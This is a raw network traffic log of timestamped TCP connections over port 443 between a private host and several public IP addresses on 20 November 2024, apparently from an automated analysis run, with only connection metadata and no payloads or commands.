                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.293966055 CET49749443192.168.2.12104.16.79.73
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.293986082 CET44349749104.16.79.73192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.294018030 CET49749443192.168.2.12104.16.79.73
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.294034004 CET49749443192.168.2.12104.16.79.73
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.294039011 CET44349749104.16.79.73192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.304142952 CET44349749104.16.79.73192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.304202080 CET49749443192.168.2.12104.16.79.73
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.304219961 CET44349749104.16.79.73192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.312772989 CET44349749104.16.79.73192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.314806938 CET49749443192.168.2.12104.16.79.73
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.314824104 CET44349749104.16.79.73192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.355691910 CET49749443192.168.2.12104.16.79.73
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.355706930 CET44349749104.16.79.73192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.402195930 CET49749443192.168.2.12104.16.79.73
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.459090948 CET49739443192.168.2.124.175.87.197
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.503335953 CET443497394.175.87.197192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.516642094 CET44349749104.16.79.73192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.520642042 CET44349749104.16.79.73192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.520682096 CET44349749104.16.79.73192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.520709991 CET49749443192.168.2.12104.16.79.73
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.520733118 CET44349749104.16.79.73192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.520768881 CET44349749104.16.79.73192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.520823002 CET49749443192.168.2.12104.16.79.73
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.520975113 CET49749443192.168.2.12104.16.79.73
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.520987988 CET44349749104.16.79.73192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.553697109 CET44349753104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.554027081 CET49753443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.554039001 CET44349753104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.554501057 CET44349753104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.554852009 CET49753443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.554924011 CET44349753104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.554991961 CET49753443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.599337101 CET44349753104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.623059988 CET44349752104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.623342991 CET49752443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.623372078 CET44349752104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.623719931 CET44349752104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.624789953 CET49752443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.624866009 CET44349752104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.625025988 CET49752443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.638808966 CET44349755104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.639070988 CET49755443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.639090061 CET44349755104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.640181065 CET44349755104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.640259027 CET49755443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.640431881 CET44349754104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.641129017 CET49755443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.641223907 CET44349755104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.641494989 CET49754443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.641518116 CET44349754104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.641669035 CET49755443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.641684055 CET44349755104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.643006086 CET44349754104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.643074036 CET49754443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.644742012 CET49754443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.644885063 CET44349754104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.645098925 CET49754443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.645111084 CET44349754104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.667339087 CET44349752104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.669023037 CET49752443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.684499979 CET49755443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.689439058 CET49754443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.712610960 CET44349756104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.713043928 CET49756443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.713063002 CET44349756104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.714118004 CET44349756104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.714235067 CET49756443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.715848923 CET49756443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.715934038 CET44349756104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.716259956 CET49756443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.716267109 CET44349756104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.739707947 CET44349757104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.739993095 CET49757443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.740006924 CET44349757104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.741055012 CET44349757104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.741190910 CET49757443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.741539001 CET49757443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.741610050 CET44349757104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.741719007 CET49757443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.766813040 CET49756443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.787332058 CET44349757104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.797384977 CET49757443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.797393084 CET44349757104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.840450048 CET49757443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:36.101480007 CET44349753104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:36.101516008 CET443497394.175.87.197192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:36.101520061 CET44349752104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:36.101538897 CET443497394.175.87.197192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:36.101546049 CET443497394.175.87.197192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:36.101577044 CET44349752104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:36.101577044 CET443497394.175.87.197192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:36.101591110 CET443497394.175.87.197192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:36.101591110 CET44349753104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:36.101608038 CET44349752104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:36.101618052 CET49739443192.168.2.124.175.87.197
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:36.101632118 CET443497394.175.87.197192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:36.101666927 CET49739443192.168.2.124.175.87.197
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:36.101670980 CET44349752104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:36.101723909 CET49753443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:36.101723909 CET49739443192.168.2.124.175.87.197
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:36.101727009 CET49752443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:36.101759911 CET44349752104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:36.101773977 CET49752443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:36.101804018 CET49752443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:36.106080055 CET49753443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:36.106096983 CET44349753104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:36.106384039 CET44349752104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:36.106496096 CET49760443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:36.106529951 CET44349760104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:36.106729984 CET49760443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:36.107331991 CET49760443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:36.107342005 CET44349760104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:36.114747047 CET44349752104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:36.114810944 CET49752443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:36.114824057 CET44349752104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:36.114837885 CET44349752104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:36.114890099 CET49752443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:36.115189075 CET49752443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:36.115205050 CET44349752104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:36.115555048 CET49761443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:36.115611076 CET44349761104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:36.115710020 CET49761443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:36.116305113 CET49761443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:36.116322994 CET44349761104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:36.208354950 CET44349755104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:36.208448887 CET44349755104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:36.208492041 CET44349755104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:36.208508968 CET49755443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:36.208529949 CET44349755104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:36.208600998 CET49755443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:36.208600998 CET44349755104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:36.208650112 CET49755443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:36.209419012 CET49755443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:36.209435940 CET44349755104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:36.210685015 CET49763443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:36.210721970 CET44349763104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:36.210922003 CET49763443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:36.211512089 CET49763443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:36.211525917 CET44349763104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:36.240071058 CET443497394.175.87.197192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:36.240153074 CET443497394.175.87.197192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:36.240150928 CET49739443192.168.2.124.175.87.197
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:36.240223885 CET49739443192.168.2.124.175.87.197
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:36.317154884 CET44349719142.250.181.68192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:36.317223072 CET44349719142.250.181.68192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:36.317363024 CET49719443192.168.2.12142.250.181.68
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:36.407886028 CET44349754104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:36.407965899 CET44349754104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:36.408016920 CET44349754104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:36.408020973 CET49754443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:36.408051014 CET44349754104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:36.408092976 CET44349754104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:36.408164978 CET49754443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:36.409600019 CET49754443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:36.409617901 CET44349754104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:36.410155058 CET49764443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:36.410195112 CET44349764104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:36.410306931 CET49764443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:36.410773039 CET49764443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:36.410804033 CET44349764104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:36.453505993 CET44349756104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:36.453751087 CET44349756104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:36.453825951 CET49756443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:36.453844070 CET44349756104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:36.453917980 CET44349756104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:36.453979015 CET49756443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:36.454981089 CET49756443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:36.454998970 CET44349756104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:36.455709934 CET49765443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:36.455744028 CET44349765104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:36.455900908 CET49765443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:36.456391096 CET49765443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:36.456406116 CET44349765104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:36.483778000 CET44349757104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:36.483885050 CET44349757104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:36.484014034 CET44349757104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:36.484016895 CET49757443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:36.484386921 CET49757443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:36.485296011 CET49757443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:36.485312939 CET44349757104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:36.485871077 CET49766443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:36.485908985 CET44349766104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:36.486149073 CET49766443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:36.486500978 CET49766443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:36.486511946 CET44349766104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:36.920175076 CET49719443192.168.2.12142.250.181.68
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:36.920207977 CET44349719142.250.181.68192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:37.355808973 CET44349761104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:37.356205940 CET49761443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:37.356220007 CET44349761104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:37.356621027 CET44349761104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:37.357177019 CET49761443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:37.357251883 CET44349761104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:37.357314110 CET49761443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:37.398495913 CET44349760104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:37.398845911 CET49760443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:37.398859978 CET44349760104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:37.399193048 CET44349760104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:37.399530888 CET49760443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:37.399584055 CET44349760104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:37.399672031 CET49760443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:37.403333902 CET44349761104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:37.405168056 CET49761443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:37.443341970 CET44349760104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:37.449225903 CET49760443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:37.471980095 CET44349763104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:37.472635984 CET49763443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:37.472649097 CET44349763104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:37.474000931 CET44349763104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:37.474114895 CET49763443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:37.474627018 CET49763443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:37.474692106 CET44349763104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:37.475317955 CET49763443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:37.475323915 CET44349763104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:37.478503942 CET49739443192.168.2.124.175.87.197
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:37.478540897 CET443497394.175.87.197192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:37.478571892 CET49739443192.168.2.124.175.87.197
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:37.478579044 CET443497394.175.87.197192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:37.524698019 CET49763443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:37.669034004 CET44349765104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:37.669315100 CET49765443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:37.669341087 CET44349765104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:37.670399904 CET44349765104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:37.670499086 CET49765443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:37.670805931 CET49765443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:37.670878887 CET44349765104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:37.671027899 CET49765443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:37.671036959 CET44349765104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:37.712949991 CET44349764104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:37.713280916 CET49764443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:37.713295937 CET44349764104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:37.714390993 CET44349764104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:37.714456081 CET49764443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:37.715363026 CET49765443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:37.716320038 CET49764443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:37.716409922 CET44349764104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:37.716479063 CET49764443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:37.761948109 CET49764443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:37.761960030 CET44349764104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:37.761987925 CET44349766104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:37.763762951 CET49766443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:37.763770103 CET44349766104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:37.764797926 CET44349766104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:37.764864922 CET49766443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:37.765280962 CET49766443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:37.765341997 CET44349766104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:37.765485048 CET49766443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:37.765491009 CET44349766104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:37.807681084 CET49766443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:37.807681084 CET49764443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:37.814991951 CET44349761104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:37.815119028 CET44349761104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:37.815279007 CET49761443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:37.816138029 CET49761443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:37.816148996 CET44349761104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:37.816721916 CET49767443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:37.816764116 CET44349767104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:37.816895008 CET49767443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:37.817344904 CET49767443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:37.817368031 CET44349767104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:37.884485006 CET44349760104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:37.884552002 CET44349760104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:37.884589911 CET44349760104.16.103.112192.168.2.12
